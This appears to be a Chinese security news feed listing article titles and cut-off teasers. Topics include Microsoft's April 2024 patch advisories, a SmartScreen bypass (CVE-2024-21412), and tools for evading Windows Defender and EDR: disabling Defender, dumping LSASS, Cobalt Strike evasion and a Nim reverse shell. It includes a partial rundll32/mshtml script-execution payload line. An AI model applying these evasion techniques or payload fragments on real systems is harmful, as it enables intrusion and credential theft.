0x00 漏洞概述2024年4月9日,微软发布了2024年4月安全更新,修复了149个安全问题,涉及组件包括:Windows BitLockerWindows 安全启动Microsoft Office...
【漏洞预警】微软2024年4月补丁日多个产品安全漏洞预警
漏洞公告近日,中国电信SRC监测到微软官方发布多个重要漏洞通告,当前官方已发布相关补丁,建议用户及时更新对应补丁修复漏洞。参考链接:https://msrc.microsoft.com/updat...
【补丁日速递】2024年4月微软补丁日安全风险通告
-赛博昆仑漏洞安全风险通告-2024年4月微软补丁日安全风险通告漏洞描述近日,赛博昆仑CERT监测到微软发布了2024年4月安全更新,涉及以下应用:Windows Defender for IoT, ...
Windows Defender 杀手 |使用注册表项永久禁用 Windows Defender
免责声明:由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立...
Windows Defender SmartScreen 漏洞可被黑客利用,微软发布声明:已修复
关键词安全漏洞安全网络公司趋势科技近日发布报告,有证据表明黑客利用 Windows Defender SmartScreen 漏洞,绕过安全检查并自动安装伪造的软件安装程序,分发 DarkGate 恶...
新工具 | 不触发Defender提取和转存LSASS
点击蓝字 关注我们免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权...
Windows SmartScreen安全功能绕过漏洞(含CVE-2024-21412复现)
前言2024年2月微软发布了一个Internet快捷方式文件安全功能绕过漏洞(CVE-2024-21412),互联网上未经身份验证的攻击者可以向目标用户发送旨在绕过显示的安全检查的特制文件,诱导用户点...
网安简报【2024/2/26】
2024-02-26 微信公众号精选安全技术文章总览洞见网安 2024-02-26 0x1 不同端下的漏洞挖掘Str1am Record 2024-02-26 20:31:00 在日常的漏洞...
使用官方免杀套件Arsenal Kit绕过360与Defender
作为一个顶级远控工具,免杀自然是刚需,Cobalt Strike官方给出了几个指导方向:一是使用Artifact插件,它是Arsenal(武器库)中的一部分,二是使用Veil框架,三是使用Java A...
工具 | EDRSilencer
注:仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。0x00 简介EDRSilencer是一款利用Windows WFP阻止EDR入侵...
绕过EDR和Windows Defender检测的反向shell
可以绕过 EDR 和 Windows Defender 检测的反向 shell 请不要上传到 VirusTotal apt install nim 汇编 nim c -d:mingw --app:g...
Windows Defender Trojan.Win32/Powessere.G / Mitigation Bypass 2
rundll32 vbscript:”..mshtml,RunHTMLApplication “+String(CreateObject(“http://Wscript.Shell”).Run(“ca...